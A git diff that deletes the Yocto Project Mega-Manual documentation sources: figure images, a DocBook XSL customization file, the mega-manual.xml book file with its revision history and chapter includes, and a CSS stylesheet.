diff --git a/documentation/mega-manual/figures/sdk-autotools-flow.png b/documentation/mega-manual/figures/sdk-autotools-flow.png
deleted file mode 100644
index ec6685f8b6..0000000000
--- a/documentation/mega-manual/figures/sdk-autotools-flow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-devtool-add-flow.png b/documentation/mega-manual/figures/sdk-devtool-add-flow.png
deleted file mode 100644
index e7d6173d2d..0000000000
--- a/documentation/mega-manual/figures/sdk-devtool-add-flow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-devtool-modify-flow.png b/documentation/mega-manual/figures/sdk-devtool-modify-flow.png
deleted file mode 100644
index 18ba8b7e65..0000000000
--- a/documentation/mega-manual/figures/sdk-devtool-modify-flow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-devtool-upgrade-flow.png b/documentation/mega-manual/figures/sdk-devtool-upgrade-flow.png
deleted file mode 100644
index 7d4f395e24..0000000000
--- a/documentation/mega-manual/figures/sdk-devtool-upgrade-flow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-environment.png b/documentation/mega-manual/figures/sdk-environment.png
deleted file mode 100644
index 78b8cad39e..0000000000
--- a/documentation/mega-manual/figures/sdk-environment.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-generation.png b/documentation/mega-manual/figures/sdk-generation.png
deleted file mode 100644
index 939f839113..0000000000
--- a/documentation/mega-manual/figures/sdk-generation.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-installed-extensible-sdk-directory.png b/documentation/mega-manual/figures/sdk-installed-extensible-sdk-directory.png
deleted file mode 100644
index b71c8ad73c..0000000000
--- a/documentation/mega-manual/figures/sdk-installed-extensible-sdk-directory.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-installed-standard-sdk-directory.png b/documentation/mega-manual/figures/sdk-installed-standard-sdk-directory.png
deleted file mode 100644
index 45c0154b19..0000000000
--- a/documentation/mega-manual/figures/sdk-installed-standard-sdk-directory.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-makefile-flow.png b/documentation/mega-manual/figures/sdk-makefile-flow.png
deleted file mode 100644
index 0ccb4180a3..0000000000
--- a/documentation/mega-manual/figures/sdk-makefile-flow.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk-title.png b/documentation/mega-manual/figures/sdk-title.png
deleted file mode 100644
index e69e03935a..0000000000
--- a/documentation/mega-manual/figures/sdk-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sdk.png b/documentation/mega-manual/figures/sdk.png
deleted file mode 100644
index a376872638..0000000000
--- a/documentation/mega-manual/figures/sdk.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/set-variable.png b/documentation/mega-manual/figures/set-variable.png
deleted file mode 100644
index d36b52754e..0000000000
--- a/documentation/mega-manual/figures/set-variable.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/simple-configuration.png b/documentation/mega-manual/figures/simple-configuration.png
deleted file mode 100644
index e8fce2bf18..0000000000
--- a/documentation/mega-manual/figures/simple-configuration.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/source-fetching.png b/documentation/mega-manual/figures/source-fetching.png
deleted file mode 100644
index bf5e187b2b..0000000000
--- a/documentation/mega-manual/figures/source-fetching.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/source-input.png b/documentation/mega-manual/figures/source-input.png
deleted file mode 100644
index 6b6ba4b338..0000000000
--- a/documentation/mega-manual/figures/source-input.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/source-repos.png b/documentation/mega-manual/figures/source-repos.png
deleted file mode 100644
index e9cff16cc8..0000000000
--- a/documentation/mega-manual/figures/source-repos.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sysprof-callers.png b/documentation/mega-manual/figures/sysprof-callers.png
deleted file mode 100644
index 640c8d9140..0000000000
--- a/documentation/mega-manual/figures/sysprof-callers.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sysprof-copy-from-user.png b/documentation/mega-manual/figures/sysprof-copy-from-user.png
deleted file mode 100644
index 8d31427824..0000000000
--- a/documentation/mega-manual/figures/sysprof-copy-from-user.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/sysprof-copy-to-user.png b/documentation/mega-manual/figures/sysprof-copy-to-user.png
deleted file mode 100644
index 7a5bab7991..0000000000
--- a/documentation/mega-manual/figures/sysprof-copy-to-user.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/toaster-title.png b/documentation/mega-manual/figures/toaster-title.png
deleted file mode 100644
index b7ea39cd8d..0000000000
--- a/documentation/mega-manual/figures/toaster-title.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/user-configuration.png b/documentation/mega-manual/figures/user-configuration.png
deleted file mode 100644
index 142454715b..0000000000
--- a/documentation/mega-manual/figures/user-configuration.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/using-a-pre-built-image.png b/documentation/mega-manual/figures/using-a-pre-built-image.png
deleted file mode 100644
index b03130d123..0000000000
--- a/documentation/mega-manual/figures/using-a-pre-built-image.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/variable-added.png b/documentation/mega-manual/figures/variable-added.png
deleted file mode 100644
index 518f25fa15..0000000000
--- a/documentation/mega-manual/figures/variable-added.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/yocto-project-transp.png b/documentation/mega-manual/figures/yocto-project-transp.png
deleted file mode 100755
index 31d2b147fd..0000000000
--- a/documentation/mega-manual/figures/yocto-project-transp.png
+++ /dev/null
diff --git a/documentation/mega-manual/figures/yp-download.png b/documentation/mega-manual/figures/yp-download.png
deleted file mode 100644
index bfd12b678a..0000000000
--- a/documentation/mega-manual/figures/yp-download.png
+++ /dev/null
diff --git a/documentation/mega-manual/mega-manual-customization.xsl b/documentation/mega-manual/mega-manual-customization.xsl
deleted file mode 100644
index b52b5b2aa3..0000000000
--- a/documentation/mega-manual/mega-manual-customization.xsl
+++ /dev/null
@@ -1,42 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:param name="generate.toc">
-   appendix  toc
-   chapter   toc
-   article   nop
-   book      nop
-   part      nop
-   preface   nop
-   qandadiv  nop
-   qandaset  nop
-   reference nop
-   section   nop
-   set       nop
-  </xsl:param>
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-  <xsl:include href="../template/gloss-permalinks.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'mega-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel">A</xsl:param>
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/mega-manual/mega-manual.xml b/documentation/mega-manual/mega-manual.xml
deleted file mode 100755
index cea1464890..0000000000
--- a/documentation/mega-manual/mega-manual.xml
+++ /dev/null
@@ -1,382 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-
-<book id='mega-manual' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-
-    <bookinfo>
-
-        <abstract>
-            The Yocto Project Mega-Manual is a concatenation of the published
-            Yocto Project HTML manuals along with the corresponding BitBake
-            User Manual for the given release.
-            The Mega-Manual exists to help users efficiently search for strings
-            across the entire Yocto Project documentation set inclusive of
-            the BitBake User Manual.
-        </abstract>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/mega-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            Yocto Project Mega-Manual
-        </title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>1.8</revnumber>
-                <date>April 2015</date>
-                <revremark>The initial document released with the Yocto Project 1.8 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.0</revnumber>
-                <date>October 2015</date>
-                <revremark>Released with the Yocto Project 2.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>April 2016</date>
-                <revremark>Released with the Yocto Project 2.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.2</revnumber>
-                <date>October 2016</date>
-                <revremark>Released with the Yocto Project 2.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.3</revnumber>
-                <date>May 2017</date>
-                <revremark>Released with the Yocto Project 2.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.4</revnumber>
-                <date>October 2017</date>
-                <revremark>Released with the Yocto Project 2.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>Released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-       </revhistory>
-
-    <copyright>
-      <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-        Permission is granted to copy, distribute and/or modify this document under
-        the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Yocto Project Mega-Manual</emphasis>
-                       is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-
-    </legalnotice>
-
-    </bookinfo>
-
-<!-- Includes brief-yoctoprojectqs -->
-
-    <para>
-        <imagedata fileref="figures/bypqs-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../brief-yoctoprojectqs/brief-yoctoprojectqs.xml"/>
-
-<!-- Includes overview-manual title image and then overview-manual chapters -->
-
-    <para>
-        <imagedata fileref="figures/overview-manual-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../overview-manual/overview-manual-intro.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../overview-manual/overview-manual-yp-intro.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../overview-manual/overview-manual-development-environment.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../overview-manual/overview-manual-concepts.xml"/>
-
-<!-- Includes dev-manual title image and then dev-manual chapters -->
-
-    <para>
-        <imagedata fileref="figures/dev-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../dev-manual/dev-manual-intro.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../dev-manual/dev-manual-start.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../dev-manual/dev-manual-common-tasks.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../dev-manual/dev-manual-qemu.xml"/>
-
-<!-- Includes sdk-manual title image and then sdk-manual chapters -->
-
-    <para>
-        <imagedata fileref="figures/sdk-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-intro.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-extensible.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-using.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-working-projects.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-appendix-obtain.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-appendix-customizing.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-appendix-customizing-standard.xml"/>
-
-<!-- Includes bsp-guide title image and then bsp-guide chapters -->
-
-    <para>
-        <imagedata fileref="figures/bsp-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../bsp-guide/bsp.xml"/>
-
-<!-- Includes kernel-dev title image and then kernel-dev chapters -->
-
-    <para>
-        <imagedata fileref="figures/kernel-dev-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-intro.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-common.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-advanced.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-concepts-appx.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-maint-appx.xml"/>
-
-<!-- Includes profile-manual title image and then profile-manual chapters -->
-
-    <para>
-        <imagedata fileref="figures/profile-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../profile-manual/profile-manual-intro.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../profile-manual/profile-manual-arch.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../profile-manual/profile-manual-usage.xml"/>
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../profile-manual/profile-manual-examples.xml"/>
-
-<!-- Includes ref-manual title image and then ref-manual chapters -->
-
-    <para>
-        <imagedata fileref="figures/poky-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-system-requirements.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-terms.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-release-process.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/migration.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-structure.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-classes.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-tasks.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-devtool-reference.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-kickstart.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-qa-checks.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-images.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-features.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-variables.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-varlocality.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/faq.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/resources.xml"/>
-
-<!-- Includes toaster-manual title image and then toaster-manual chapters -->
-
-    <para>
-        <imagedata fileref="figures/toaster-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../toaster-manual/toaster-manual-intro.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../toaster-manual/toaster-manual-start.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../toaster-manual/toaster-manual-setup-and-use.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../toaster-manual/toaster-manual-reference.xml"/>
-
-<!-- Includes bitbake-user-manual title image and then bitbake-user-manual chapters -->
-
-    <para>
-        <imagedata fileref="figures/bitbake-title.png" width="100%" align="left" scalefit="1" />
-    </para>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml"/>
-
-    <xi:include
-        xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml"/>
-
-</book>
-
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/mega-manual/mega-style.css b/documentation/mega-manual/mega-style.css
deleted file mode 100644
index cd71eb6425..0000000000
--- a/documentation/mega-manual/mega-style.css
+++ /dev/null
@@ -1,989 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/mega-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
